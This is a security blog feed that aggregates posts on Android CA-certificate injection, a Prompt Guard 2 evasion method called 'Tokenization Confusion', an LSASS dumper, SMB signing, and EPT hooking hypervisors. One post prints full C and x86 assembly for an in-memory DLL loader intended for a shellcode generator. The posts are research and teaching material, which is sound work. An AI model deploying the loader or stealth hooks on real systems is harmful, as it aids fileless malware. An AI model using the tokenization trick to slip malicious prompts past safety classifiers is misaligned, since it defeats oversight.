/system/bin/nsenter --mount=/proc/$zp/ns/mnt -- /bin/mount --rbind $SYS_CERT_DIR $APEX_CERT_DIR

With all of these complex mounts, I was surprised to see that disabling root CAs from the settings still worked without any issues. Digging a bit deeper into the implementation, it turns out that root certificates are not removed, but rather copied to the /data/misc/user/0/cacerts-removed directory when they are disabled in the settings application:

// conscrypt.jar - com.android.org.conscrypt.TrustedCertificateStore
public void deleteCertificateEntry(String alias) throws IOException, CertificateException {
        File file;
        if (alias == null || (file = fileForAlias(alias)) == null) {
            return;
        }
        if (isSystem(alias)) {
            X509Certificate cert = readCertificate(file);
            if (cert == null) {
                return;
            }
            // deleteDir = /data/misc/user/0/cacerts-removed/
            File deleted = getCertificateFile(this.deletedDir, cert);
            if (deleted.exists()) {
                return;
            }
            writeCertificate(deleted, cert);
            return;
        }
        if (isUser(alias)) {
            new FileOutputStream(file).close();
            removeUnnecessaryTombstones(alias);
        }
    }

When the TrustedCertificateStore later looks for the correct root CA, it checks if the identified root CA is available in the cacerts-removed directory and ignores it if it is:

// conscrypt.jar - com.android.org.conscrypt.TrustedCertificateStore
@Override public X509Certificate getTrustAnchor(final X509Certificate c) {
    CertSelector selector = new CertSelector(this) { // from class: com.android.org.conscrypt.TrustedCertificateStore.2
        @Override // com.android.org.conscrypt.TrustedCertificateStore.CertSelector
        public boolean match(X509Certificate ca) {
            return ca.getPublicKey().equals(c.getPublicKey());
        }
    };
    X509Certificate user = (X509Certificate) findCert(this.addedDir, c.getSubjectX500Principal(), selector, X509Certificate.class);
    if (user != null) {
        return user;
    }
    X509Certificate system = (X509Certificate) findCert(this.systemDir, c.getSubjectX500Principal(), selector, X509Certificate.class);
    if (system != null && !isDeletedSystemCertificate(system)) {
        return system;
    }
    return null;
}
public boolean isDeletedSystemCertificate(X509Certificate x) {
    return getCertificateFile(this.deletedDir, x).exists();
}
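
You can observe this tombstoning behaviour directly in a rooted shell: disabling a system CA in Settings makes a copy of it appear in the deleted-certificates directory mentioned above, while the read-only /system and /apex stores remain untouched:

$ su -c 'ls /data/misc/user/0/cacerts-removed/'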

Final solution

It took quite some troubleshooting and testing, but my Magisk module has now been updated to cover all (🤞) situations, ranging from Android 7 through Android 16 Beta. Some of the features:

  • Should work on Magisk, KernelSU, KernelSU Next, APatch
  • Copies all certificates from the user store to the /system store
  • Supports multiple users (e.g. work profiles)
  • Mounts the updated /system store to /apex, if it’s available
  • Injects the updated mount into zygote and all children
  • When zygote crashes, it reinjects all mounts
  • Disabling root CAs is supported

Enjoy, and open a PR if there are any issues! https://github.com/NVISOsecurity/AlwaysTrustUserCerts

Jeroen Beckers

Jeroen Beckers is a mobile security expert working in the NVISO Software Security Assessment team. He travels around the world teaching SANS SEC575: iOS and Android Application Security Analysis and Penetration Testing and is a co-author of the OWASP Mobile Application Security (MAS) project, which includes:

  • OWASP Mobile Application Security Testing Guide (MASTG)
  • OWASP Mobile Application Security Verification Standard (MASVS)
  • OWASP Mobile Application Security Weakness Enumeration (MASWE)

Tokenization Confusion

4 June 2025 at 23:01
In this post we look at the new Prompt Guard 2 model from Meta, and introduce a concept I've been calling "Tokenization Confusion", which aims to confuse Unigram tokenization into generating tokens that result in the misclassification of malicious prompts. We'll also look at why building up our ML knowledge will lead to better findings when assessing LLM APIs, as I discovered during a flight across the Atlantic.

Shellcode: In-Memory Execution of DLL

24 June 2019 at 01:30

Introduction

In March 2002, the infamous group 29A published their sixth e-zine. One of the articles, In-Memory PE EXE Execution by Z0MBiE, demonstrated how to manually load and run a Portable Executable entirely from memory. The InMem client provided as a PoC downloads a PE from a remote TFTP server into memory and, after some basic preparation, executes the entrypoint. Of course, running console and GUI applications from memory isn’t that straightforward because Microsoft Windows consists of subsystems. Try manually executing a console application from inside a GUI subsystem without using NtCreateProcess and it will probably cause an unhandled exception, crashing the host process. Unless designed for a specific subsystem, running a DLL from memory is relatively error-free and simple to implement, so this post illustrates just that with C and x86 assembly.

Proof of Concept

Z0MBiE didn’t seem to perform any other research beyond a PoC; however, Y0da did write a tool called InConEx that was published in 29A#7 ca. 2004. Since then, various other implementations have been published, but they all seem to be derived in one form or another from the original PoC and use the following steps.

  1. Allocate RWX memory for size of image. (VirtualAlloc)
  2. Copy each section to RWX memory.
  3. Initialize the import table. (LoadLibrary/GetProcAddress)
  4. Apply relocations.
  5. Execute entry point.

Today, some basic loaders will also handle resources and TLS callbacks. The following is an example in C based on Z0MBiE’s article.

#include <windows.h>
#include <string.h>

// Map a relative virtual address within the mapped image to a usable pointer.
#define RVA2VA(type, base, rva) (type)((ULONG_PTR)(base) + (rva))

// Relocation type handled by this loader: HIGHLOW on x86, DIR64 on x64.
#ifdef _WIN64
#define IMAGE_REL_TYPE IMAGE_REL_BASED_DIR64
#else
#define IMAGE_REL_TYPE IMAGE_REL_BASED_HIGHLOW
#endif

typedef struct _IMAGE_RELOC {
    WORD offset :12;
    WORD type   :4;
} IMAGE_RELOC, *PIMAGE_RELOC;

typedef BOOL (WINAPI *DllMain_t)(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved);
typedef VOID (WINAPI *entry_exe)(VOID);

VOID load_dllx(LPVOID base);

VOID load_dll(LPVOID base) {
    PIMAGE_DOS_HEADER        dos;
    PIMAGE_NT_HEADERS        nt;
    PIMAGE_SECTION_HEADER    sh;
    PIMAGE_THUNK_DATA        oft, ft;
    PIMAGE_IMPORT_BY_NAME    ibn;
    PIMAGE_IMPORT_DESCRIPTOR imp;
    PIMAGE_RELOC             list;
    PIMAGE_BASE_RELOCATION   ibr;
    DWORD                    rva;
    PBYTE                    ofs;
    PCHAR                    name;
    HMODULE                  dll;
    ULONG_PTR                ptr;
    DllMain_t                DllMain;
    LPVOID                   cs;
    DWORD                    i, cnt;
    
    dos = (PIMAGE_DOS_HEADER)base;
    nt  = RVA2VA(PIMAGE_NT_HEADERS, base, dos->e_lfanew);
    
    // 1. Allocate RWX memory for file
    cs  = VirtualAlloc(
      NULL, nt->OptionalHeader.SizeOfImage, 
      MEM_COMMIT | MEM_RESERVE, 
      PAGE_EXECUTE_READWRITE);
      
    // 2. Copy each section to RWX memory
    sh = IMAGE_FIRST_SECTION(nt);
      
    for(i=0; i<nt->FileHeader.NumberOfSections; i++) {
      memcpy((PBYTE)cs + sh[i].VirtualAddress,
          (PBYTE)base + sh[i].PointerToRawData,
          sh[i].SizeOfRawData);
    }
    
    // 3. Process the Import Table
    rva = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress;
    imp = RVA2VA(PIMAGE_IMPORT_DESCRIPTOR, cs, rva);
      
    // For each DLL
    for (;imp->Name!=0; imp++) {
      name = RVA2VA(PCHAR, cs, imp->Name);
      
      // Load it
      dll = LoadLibrary(name);
      
      // Resolve the API for this library
      oft = RVA2VA(PIMAGE_THUNK_DATA, cs, imp->OriginalFirstThunk);
      ft  = RVA2VA(PIMAGE_THUNK_DATA, cs, imp->FirstThunk);
        
      // For each API
      for (;; oft++, ft++) {
        // No API left?
        if (oft->u1.AddressOfData == 0) break;
        
        PULONG_PTR func = (PULONG_PTR)&ft->u1.Function;
        
        // Resolve by ordinal?
        if (IMAGE_SNAP_BY_ORDINAL(oft->u1.Ordinal)) {
          *func = (ULONG_PTR)GetProcAddress(dll, (LPCSTR)IMAGE_ORDINAL(oft->u1.Ordinal));
        } else {
          // Resolve by name
          ibn   = RVA2VA(PIMAGE_IMPORT_BY_NAME, cs, oft->u1.AddressOfData);
          *func = (ULONG_PTR)GetProcAddress(dll, ibn->Name);
        }
      }
    }
    
    // 4. Apply Relocations
    rva  = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress;
    ibr  = RVA2VA(PIMAGE_BASE_RELOCATION, cs, rva);
    ofs  = (PBYTE)cs - nt->OptionalHeader.ImageBase;
    
    while(ibr->VirtualAddress != 0) {
      list = (PIMAGE_RELOC)(ibr + 1);

      while ((PBYTE)list != (PBYTE)ibr + ibr->SizeOfBlock) {
        if(list->type == IMAGE_REL_TYPE) {
          *(ULONG_PTR*)((PBYTE)cs + ibr->VirtualAddress + list->offset) += (ULONG_PTR)ofs;
        }
        list++;
      }
      ibr = (PIMAGE_BASE_RELOCATION)list;
    }

    // 5. Execute entrypoint
    DllMain = RVA2VA(DllMain_t, cs, nt->OptionalHeader.AddressOfEntryPoint);
    DllMain(cs, DLL_PROCESS_ATTACH, NULL);
}

x86 assembly

Using the exact same logic, except implemented in hand-written assembly… for illustration, of course!

; DLL loader in 306 bytes of x86 assembly (written for fun)
; odzhan

      %include "ds.inc"

      bits   32

      struc _ds
          .VirtualAlloc        resd 1 ; edi
          .LoadLibraryA        resd 1 ; esi
          .GetProcAddress      resd 1 ; ebp
          .AddressOfEntryPoint resd 1 ; esp
          .ImportTable         resd 1 ; ebx
          .BaseRelocationTable resd 1 ; edx
          .ImageBase           resd 1 ; ecx
      endstruc

      %ifndef BIN
        global load_dllx
        global _load_dllx
      %endif
      
load_dllx:
_load_dllx: 
      pop    eax            ; eax = return address
      pop    ebx            ; ebx = base of PE file
      push   eax            ; save return address on stack
      pushad                ; save all registers
      call   init_api       ; load address of api hash onto stack
      dd     0x38194E37     ; VirtualAlloc
      dd     0xFA183D4A     ; LoadLibraryA
      dd     0x4AAC90F7     ; GetProcAddress
init_api:
      pop    esi            ; esi = api hashes
      pushad                ; allocate 32 bytes of memory for _ds
      mov    edi, esp       ; edi = _ds
      push   TEB.ProcessEnvironmentBlock
      pop    ecx
      cdq                   ; eax should be < 0x80000000
get_apis:
      lodsd                 ; eax = hash
      pushad
      mov    eax, [fs:ecx]
      mov    eax, [eax+PEB.Ldr]
      mov    edi, [eax+PEB_LDR_DATA.InLoadOrderModuleList + LIST_ENTRY.Flink]
      jmp    get_dll
next_dll:    
      mov    edi, [edi+LDR_DATA_TABLE_ENTRY.InLoadOrderLinks + LIST_ENTRY.Flink]
get_dll:
      mov    ebx, [edi+LDR_DATA_TABLE_ENTRY.DllBase]
      mov    eax, [ebx+IMAGE_DOS_HEADER.e_lfanew]
      ; ecx = IMAGE_DATA_DIRECTORY.VirtualAddress
      mov    ecx, [ebx+eax+IMAGE_NT_HEADERS.OptionalHeader + \
                           IMAGE_OPTIONAL_HEADER32.DataDirectory + \
                           IMAGE_DIRECTORY_ENTRY_EXPORT * IMAGE_DATA_DIRECTORY_size + \
                           IMAGE_DATA_DIRECTORY.VirtualAddress]
      jecxz  next_dll
      ; esi = offset IMAGE_EXPORT_DIRECTORY.NumberOfNames 
      lea    esi, [ebx+ecx+IMAGE_EXPORT_DIRECTORY.NumberOfNames]
      lodsd
      xchg   eax, ecx
      jecxz  next_dll        ; skip if no names
      ; ebp = IMAGE_EXPORT_DIRECTORY.AddressOfFunctions     
      lodsd
      add    eax, ebx        ; ebp = RVA2VA(eax, ebx)
      xchg   eax, ebp        ;
      ; edx = IMAGE_EXPORT_DIRECTORY.AddressOfNames
      lodsd
      add    eax, ebx        ; edx = RVA2VA(eax, ebx)
      xchg   eax, edx        ;
      ; esi = IMAGE_EXPORT_DIRECTORY.AddressOfNameOrdinals      
      lodsd
      add    eax, ebx        ; esi = RVA(eax, ebx)
      xchg   eax, esi
get_name:
      pushad
      mov    esi, [edx+ecx*4-4] ; esi = AddressOfNames[ecx-1]
      add    esi, ebx           ; esi = RVA2VA(esi, ebx)
      xor    eax, eax           ; eax = 0
      cdq                       ; h = 0
hash_name:    
      lodsb
      add    edx, eax
      ror    edx, 8
      dec    eax
      jns    hash_name
      cmp    edx, [esp + _eax + pushad_t_size]   ; hashes match?
      popad
      loopne get_name              ; --ecx && edx != hash
      jne    next_dll              ; get next DLL        
      movzx  eax, word [esi+ecx*2] ; eax = AddressOfNameOrdinals[eax]
      add    ebx, [ebp+eax*4]      ; ecx = base + AddressOfFunctions[eax]
      mov    [esp+_eax], ebx
      popad                        ; restore all
      stosd
      inc    edx
      jnp    get_apis              ; until PF = 1
      
      ; dos = (PIMAGE_DOS_HEADER)ebx
      push   ebx
      add    ebx, [ebx+IMAGE_DOS_HEADER.e_lfanew]
      add    ebx, ecx
      ; esi = &nt->OptionalHeader.AddressOfEntryPoint
      lea    esi, [ebx+IMAGE_NT_HEADERS.OptionalHeader + \
                       IMAGE_OPTIONAL_HEADER32.AddressOfEntryPoint - 30h]
      movsd          ; [edi+ 0] = AddressOfEntryPoint
      mov    eax, [ebx+IMAGE_NT_HEADERS.OptionalHeader + \
                       IMAGE_OPTIONAL_HEADER32.DataDirectory + \
                       IMAGE_DIRECTORY_ENTRY_IMPORT * IMAGE_DATA_DIRECTORY_size + \
                       IMAGE_DATA_DIRECTORY.VirtualAddress - 30h]
      stosd          ; [edi+ 4] = Import Directory Table RVA
      mov    eax, [ebx+IMAGE_NT_HEADERS.OptionalHeader + \
                       IMAGE_OPTIONAL_HEADER32.DataDirectory + \
                       IMAGE_DIRECTORY_ENTRY_BASERELOC * IMAGE_DATA_DIRECTORY_size + \
                       IMAGE_DATA_DIRECTORY.VirtualAddress - 30h]
      stosd          ; [edi+ 8] = Base Relocation Table RVA
      lodsd          ; skip BaseOfCode
      lodsd          ; skip BaseOfData
      movsd          ; [edi+12] = ImageBase
      ; cs  = VirtualAlloc(NULL, nt->OptionalHeader.SizeOfImage, 
      ;          MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
      push   PAGE_EXECUTE_READWRITE
      xchg   cl, ch
      push   ecx
      push   dword[esi + IMAGE_OPTIONAL_HEADER32.SizeOfImage - \
                         IMAGE_OPTIONAL_HEADER32.SectionAlignment]
      push   0                           ; NULL
      call   dword[esp + _ds.VirtualAlloc + 5*4]
      xchg   eax, edi                    ; edi = cs
      pop    esi                         ; esi = base
      
      ; load number of sections
      movzx  ecx, word[ebx + IMAGE_NT_HEADERS.FileHeader + \
                             IMAGE_FILE_HEADER.NumberOfSections - 30h]
      ; edx = IMAGE_FIRST_SECTION()
      movzx  edx, word[ebx + IMAGE_NT_HEADERS.FileHeader + \
                             IMAGE_FILE_HEADER.SizeOfOptionalHeader - 30h]
      lea    edx, [ebx + edx + IMAGE_NT_HEADERS.OptionalHeader - 30h]
map_section:
      pushad
      add    edi, [edx + IMAGE_SECTION_HEADER.VirtualAddress]
      add    esi, [edx + IMAGE_SECTION_HEADER.PointerToRawData]
      mov    ecx, [edx + IMAGE_SECTION_HEADER.SizeOfRawData]
      rep    movsb
      popad
      add    edx, IMAGE_SECTION_HEADER_size
      loop   map_section
      mov    ebp, edi
      ; process the import table
      pushad
      mov    ecx, [esp + _ds.ImportTable + pushad_t_size]
      jecxz  imp_l2
      lea    ebx, [ecx + ebp]
imp_l0:
      ; esi / oft = RVA2VA(PIMAGE_THUNK_DATA, cs, imp->OriginalFirstThunk);
      mov    esi, [ebx+IMAGE_IMPORT_DESCRIPTOR.OriginalFirstThunk]
      add    esi, ebp
      ; edi / ft  = RVA2VA(PIMAGE_THUNK_DATA, cs, imp->FirstThunk);
      mov    edi, [ebx+IMAGE_IMPORT_DESCRIPTOR.FirstThunk]
      add    edi, ebp
      mov    ecx, [ebx+IMAGE_IMPORT_DESCRIPTOR.Name]
      add    ebx, IMAGE_IMPORT_DESCRIPTOR_size
      jecxz  imp_l2
      add    ecx, ebp         ; name = RVA2VA(PCHAR, cs, imp->Name);
      ; dll = LoadLibrary(name);
      push   ecx
      call   dword[esp + _ds.LoadLibraryA + 4 + pushad_t_size]  
      xchg   edx, eax         ; edx = dll
imp_l1:
      lodsd                   ; eax = oft->u1.AddressOfData, oft++;
      xchg   eax, ecx
      jecxz  imp_l0           ; if (oft->u1.AddressOfData == 0) break; 
      btr    ecx, 31
      jc     imp_Lx           ; IMAGE_SNAP_BY_ORDINAL(oft->u1.Ordinal)
      ; RVA2VA(PIMAGE_IMPORT_BY_NAME, cs, oft->u1.AddressOfData)
      lea    ecx, [ebp + ecx + IMAGE_IMPORT_BY_NAME.Name]
imp_Lx:
      ; eax = GetProcAddress(dll, ecx);
      push   edx
      push   ecx
      push   edx
      call   dword[esp + _ds.GetProcAddress + 3*4 + pushad_t_size]  
      pop    edx
      stosd                   ; ft->u1.Function = eax
      jmp    imp_l1
imp_l2:
      popad
      ; ibr  = RVA2VA(PIMAGE_BASE_RELOCATION, cs, dir[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress);
      mov    esi, [esp + _ds.BaseRelocationTable]
      add    esi, ebp
      ; ofs  = (PBYTE)cs - opt->ImageBase;
      mov    ebx, ebp
      sub    ebp, [esp + _ds.ImageBase]
reloc_L0:
      ; while (ibr->VirtualAddress != 0) {
      lodsd                  ; eax = ibr->VirtualAddress
      xchg   eax, ecx
      jecxz  call_entrypoint
      lodsd                  ; skip ibr->SizeOfBlock
      lea    edi, [esi + eax - 8]
reloc_L1:
      lodsw                  ; ax = *(WORD*)list;
      and    eax, 0xFFF      ; eax = list->offset
      jz     reloc_L2        ; IMAGE_REL_BASED_ABSOLUTE is used for padding
      add    eax, ecx        ; eax += ibr->VirtualAddress
      add    eax, ebx        ; eax += cs
      add    [eax], ebp      ; *(DWORD*)eax += ofs
      ; ibr = (PIMAGE_BASE_RELOCATION)list;
reloc_L2:
      ; (PBYTE)list != (PBYTE)ibr + ibr->SizeOfBlock
      cmp    esi, edi
      jne    reloc_L1
      jmp    reloc_L0
call_entrypoint:
  %ifndef EXE
      push   ecx                 ; lpvReserved
      push   DLL_PROCESS_ATTACH  ; fdwReason    
      push   ebx                 ; HINSTANCE   
      ; DllMain = RVA2VA(entry_exe, cs, opt->AddressOfEntryPoint);
      add    ebx, [esp + _ds.AddressOfEntryPoint + 3*4]
  %else
      add    ebx, [esp + _ds.AddressOfEntryPoint]
  %endif
      call   ebx
      popad                  ; release _ds
      popad                  ; restore registers
      ret

Running a DLL from memory isn’t difficult if we ignore the export table, resources, TLS and the subsystem. The only requirement is that the DLL has a relocation section. The C-generated assembly will be used in a new version of Donut, while the sources in this post can be found here.

Doppelganger: An Advanced LSASS Dumper with Process Cloning

3 June 2025 at 12:52
GitHub repo: https://github.com/vari-sh/RedTeamGrimoire/tree/main/Doppelganger

What is LSASS? The Local Security Authority Subsystem Service (LSASS) is a core component of the Windows operating system, responsible for enforcing the security policy on the system. LSASS is a process that runs as lsass.exe and plays a fundamental role in: User authentication: It verifies users logging into the system, interacting with authentication protocols such as […]

Build your own pen testing tools and master red teaming tactics | Ed Williams

2 June 2025 at 18:00

Get your FREE Cybersecurity Salary Guide: https://www.infosecinstitute.com/form/cybersecurity-salary-guide-podcast/?utm_source=youtube&utm_medium=podcast&utm_campaign=podcast

Ed Williams, Vice President of EMEA Consulting and Professional Services (CPS) at TrustWave, shares his two decades of pentesting and red teaming experience with Cyber Work listeners. 


From building his first programs on a BBC Micro (an early PC underwritten by the BBC network in England to promote computer literacy) to co-authoring award-winning red team security tools, Ed discusses his favorite red team social engineering trick (hint: it involves fire extinguishers!), and the ways that pentesting and red team methodologies have (and have not) changed in 20 years. As a bonus, Ed explains how he created a red team tool that gained accolades from the community in 2013, and how building your own tools can help you create your personal calling card in the cybersecurity industry! 

Whether you're breaking into cybersecurity or looking to level up your pentesting skills, Ed's practical advice and red team “war stories,” as well as his philosophy of continuous learning that he calls “Stacking Days,” bring practical and powerful techniques to your study of cybersecurity.

0:00 - Intro to today's episode
2:17 - Meet Ed Williams and his BBC Micro origins
5:16 - Evolution of pentesting since 2008
12:50 - Creating the RedSnarf tool in 2013
17:18 - Advice for aspiring pentesters in 2025
19:59 - Building community and finding collaborators
22:28 - Red teaming vs pentesting strategies
24:19 - Red teaming, social engineering, and fire extinguishers
27:07 - Early career obsession and focus
29:41 - Essential skills: Python and command-line mastery
31:30 - Best career advice: "Stacking Days"
32:12 - About TrustWave and connecting with Ed

About Infosec
Infosec's mission is to put people at the center of cybersecurity. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and phishing training to stay cyber-safe at work and home. More than 70% of the Fortune 500 have relied on Infosec to develop their security talent, and more than 5 million learners worldwide are more cyber-resilient from Infosec IQ's security awareness training. Learn more at infosecinstitute.com.

Micropatches Released for Preauth DoS on Windows Deployment Service (CVE-2025-29957)

29 May 2025 at 13:17

 


May 2025 Windows updates brought a fix for CVE-2025-29957, a denial of service vulnerability allowing an attacker on the network to easily consume all available memory on a Windows Server with Windows Deployment Service installed. This could leave the server unable to provide Windows deployment services as well as other services such as network file sharing and printing, or any other functionality based on its configured server roles.

The vulnerability was reported to Microsoft by security researchers R4nger & Zhiniang Peng.

 

Microsoft's Patch

Microsoft patched this issue by properly freeing allocated memory on each remote session initiation.

 

Our Micropatch

Our patch does the exact same thing as Microsoft's.


Micropatch Availability

Micropatches were written for the following security-adopted versions of Windows with all available Windows Updates installed:

  1. Windows Server 2012 - fully updated without ESU, with ESU 1
  2. Windows Server 2012 R2 - fully updated without ESU, with ESU 1

 

Micropatches have already been distributed to, and applied on, all affected online computers with 0patch Agent in PRO or Enterprise accounts (unless Enterprise group settings prevented that). 

Vulnerabilities like these get discovered on a regular basis, and attackers know about them all. If you're using Windows versions that are no longer receiving official security updates, 0patch will make sure these vulnerabilities won't be exploited on your computers - and you won't even have to know or care about these things.

If you're new to 0patch, create a free account in 0patch Central, start a free trial, then install and register 0patch Agent. Everything else will happen automatically. No computer reboot will be needed.

We would like to thank security researcher Zhiniang Peng for publishing their analysis, which made it possible for us to create a micropatch for this issue.

Did you know 0patch will security-adopt Windows 10 and Office 2016/2019 when they go out of support in October 2025, allowing you to keep using them for at least 5 more years? Read more about it here.

To learn more about 0patch, please visit our Help Center.

shell32.dll, #61

By: adam
30 May 2025 at 22:29
The function exported by shell32.dll as ordinal #61 uses the internal name RunFileDlg, so it is no surprise that running rundll32.exe shell32.dll, #61 presents the familiar Run dialog box.
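The same dialog can also be launched programmatically by shelling out to rundll32 with the ordinal syntax above. The short Rust sketch below is illustrative only and simply wraps the command shown in this post.

use std::process::Command;

fn main() -> std::io::Result<()> {
    // Launch the Run dialog by invoking shell32.dll's export #61 (RunFileDlg)
    // through rundll32, exactly as on the command line.
    Command::new("rundll32.exe")
        .arg("shell32.dll,#61")
        .status()?;
    Ok(())
}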

SMB Signing: Policies and Recommended Settings

1 June 2025 at 10:00

Enabling SMB signing via Group Policy (for Windows Pro or higher)

The previous post introduced SMB signing and its key functions. One question remained open: how do I actually enable it? How SMB signing is enabled and what the recommended settings are is the topic of this post.

Where to find the settings

  • Open the Group Policy Editor:
    • Press the Windows key + R to open the Run dialog.
    • Type gpedit.msc.
    • Confirm with Enter.
  • Navigate to the relevant policy:
    Click through the following structure:
    • Computer Configuration
    • Windows Settings
    • Security Settings
    • Local Policies
    • Security Options
  • Select the SMB signing policies:
    In Security Options you will find the relevant policies:
    • Microsoft network client: Digitally sign communications (always)
    • Microsoft network client: Digitally sign communications (if server agrees)
    • Microsoft network server: Digitally sign communications (always)
    • Microsoft network server: Digitally sign communications (if client agrees)

Note:

  • Always = signing is strictly required. No connection is established without a valid signature.
  • If server agrees = signing is offered but not enforced. Communication is signed if the server also agrees to signing.
  • If client agrees = signing is offered but not enforced. Communication is signed if the client also agrees to signing.

If you only allow signing without requiring it, you remain unprotected against unsigned communication and the data transferred over it.
With the newer SMB 3 this setting is somewhat simplified: a signature is accepted automatically whenever one is offered. Since agreeing to a signature when it is offered can only be beneficial, this behaviour is now the default.

Registry representation of the policies

  • Microsoft network client: Digitally sign communications (always):
    • Registry key: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanManWorkstation\Parameters
    • Registry value: RequireSecuritySignature
    • Data type: REG_DWORD
    • Data: 0 (disable), 1 (enable)
  • Microsoft network client: Digitally sign communications (if server agrees):
    • Registry key: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanManWorkstation\Parameters
    • Registry value: EnableSecuritySignature
    • Data type: REG_DWORD
    • Data: 0 (disable), 1 (enable)
  • Microsoft network server: Digitally sign communications (always):
    • Registry key: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters
    • Registry value: RequireSecuritySignature
    • Data type: REG_DWORD
    • Data: 0 (disable), 1 (enable)
  • Microsoft network server: Digitally sign communications (if client agrees):
    • Registry key: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters
    • Registry value: EnableSecuritySignature
    • Data type: REG_DWORD
    • Data: 0 (disable), 1 (enable)

Enabling SMB signing via PowerShell

Since Windows Home has no Group Policy Editor, the setting can only be made via PowerShell there. This method can also be used on all other Windows editions.

  • Run PowerShell as Administrator
  • Command to enable SMB signing for outgoing connections:
    Set-SmbClientConfiguration -RequireSecuritySignature $true
  • Command to enable SMB signing for incoming connections:
    Set-SmbServerConfiguration -RequireSecuritySignature $true
  • Verify the settings:
    Get-SmbClientConfiguration | FL RequireSecuritySignature
    Get-SmbServerConfiguration | FL RequireSecuritySignature

If both settings return True, the configuration has been applied correctly and SMB signing is enabled.

Recommended settings

To ensure the best protection, we recommend the following settings:

  • Microsoft network client: Digitally sign communications (always):
    ✅ Enable
  • Microsoft network client: Digitally sign communications (if server agrees):
    ✅ Enable
  • Microsoft network server: Digitally sign communications (always):
    ✅ Enable
  • Microsoft network server: Digitally sign communications (if client agrees):
    ✅ Enable

Done

With these settings, transfers over SMB are secured, and with very little effort. The next post covers known issues and provides more information about when this signing actually takes effect.

The post SMB Signing: Policies and Recommended Settings appeared first on HanseSecure GmbH.

Hypervisors for Memory Introspection and Reverse Engineering

2 June 2025 at 00:00

Introduction

In this article, we explore the design and implementation of Rust-based hypervisors for memory introspection and reverse engineering on Windows. We cover two projects - illusion-rs, a UEFI-based hypervisor, and matrix-rs, a Windows kernel driver-based hypervisor. Both leverage Extended Page Tables (EPT) to implement stealthy control flow redirection without modifying guest memory.

We begin by identifying how to reliably detect when the System Service Descriptor Table (SSDT) is fully initialized within ntoskrnl.exe, allowing hooks to be safely installed without risking a system crash. Illusion and Matrix differ in how they trigger and redirect execution. Illusion uses a single EPT and in-place patching with VM-exit instructions like VMCALL, combined with Monitor Trap Flag (MTF) stepping to replay original bytes safely. In contrast, Matrix uses a dual-EPT model where the primary EPT maps read/write memory and the secondary EPT remaps execute-only shadow pages containing trampoline hooks. Execution is redirected using INT3 breakpoints and dynamic EPTP switching during EPT violations. Both approaches hide inline hooks from guest virtual memory and redirect execution flow to attacker-controlled code - such as shellcode or handler functions - using EPT-based remapping and VM-exits triggered by CPU instructions like INT3, VMCALL, or CPUID.

In hypervisor development, shadowing refers to creating a second, hypervisor-controlled view of guest memory. When a page is shadowed, the hypervisor creates a duplicate of the original page - typically referred to as a shadow page - and updates the EPT to redirect access to this copy. This allows the hypervisor to intercept, monitor, or redirect memory accesses without modifying the original guest memory. Shadowing is commonly used to inject hooks, conceal modifications, or control execution flow at a fine-grained level. The guest and shadow pages remain distinct: the guest believes it is accessing its own memory, while the hypervisor controls what is actually seen or executed.

We demonstrate how to use execute-only permissions to trap instruction fetches, read/write-only permissions to catch access violations, and shadow pages to inject trampoline redirections. For introspection and control transfer, we rely on instruction-level traps such as VMCALL, CPUID, and INT3, depending on the context. In Illusion, instruction replay is handled via Monitor Trap Flag (MTF) single-stepping to safely restore overwritten bytes.

While these techniques are well-known in the game hacking community, they remain underutilized in infosec. This article aims to bridge that gap by providing a practical, reproducible walkthrough of early boot-time and kernel-mode EPT hooking techniques. All techniques used are public, stable, and do not rely on undocumented internals or privileged SDKs.

The approach taken prioritizes minimalism and reproducibility. We assume readers have a working understanding of paging, virtual memory, and the basics of Intel VT-x and EPT. While some concepts may apply to AMD SVM and NPT, this article focuses exclusively on Intel platforms. Both hypervisors avoid modifying guest memory entirely, preserving system integrity and navigating around kernel protections like PatchGuard. This enables stealth monitoring of functions like NtCreateFile and MmIsAddressValid from outside the guest’s control using EPT-backed remapping.

Table of Contents

Illusion: UEFI-Based Hypervisor with EPT-Based Hooking

Illusion is a UEFI-based hypervisor designed for early boot-time memory introspection and syscall hooking. It was developed after matrix-rs, with a simpler design, better structure, and a focus on controlling execution without touching guest memory.

Unlike matrix, which operates from kernel mode with dual-EPT support shared across all logical processors, illusion runs from UEFI firmware and uses a single EPT per logical processor to shadow and detour guest execution. Some hypervisors extend this design further by using two, three, or more EPTs - for example, maintaining separate EPTs for different execution stages or process contexts. Others also implement per-logical-processor EPT isolation for tighter control. Hooks in illusion are applied using execute-only shadow pages combined with VMCALL and Monitor Trap Flag (MTF) single-stepping for memory introspection. While Illusion prioritizes early boot visibility and minimal guest interference, it also supports runtime control via user-mode CPUID hypercalls. As with all EPT-based hooking techniques, the architecture comes with trade-offs in design, maintainability, complexity, and detection risk - but those nuances are out of scope for this post.

The following diagram shows how this technique is implemented in the illusion-rs hypervisor, specifically how EPT is used to hook kernel memory. While in this example it’s applied early in the boot process, the same hooking logic can also be triggered later - such as from user-mode - if the hypervisor is signaled to enable or disable the hooks.

EPT Hooking Flow Diagram - Illusion Hypervisor Figure 1: Control flow of EPT-based function hooking in the Illusion UEFI hypervisor

Each step shown in the diagram is explained in detail in the sections below.

Setting up IA32_LSTAR MSR hook during Initialization (initialize_shared_hook_manager())

To resolve the physical and virtual base addresses and the size of the Windows kernel, we intercept writes to the IA32_LSTAR MSR. This register holds the address of the syscall handler, which Windows sets to its kernel-mode dispatcher, KiSystemCall64. When a WRMSR VM-exit occurs, we check if the MSR ID corresponds to IA32_LSTAR. If so, we extract the MSR value and scan memory backwards from that address to locate the MZ signature, which marks the start of the ntoskrnl.exe PE image, thereby determining its base virtual address. The purpose of intercepting IA32_LSTAR is not to modify syscall behavior, but to reliably extract the kernel’s loaded base address during early boot. It’s a reliable anchor point because Windows always writes to this MSR during early boot to set up KiSystemCall64.

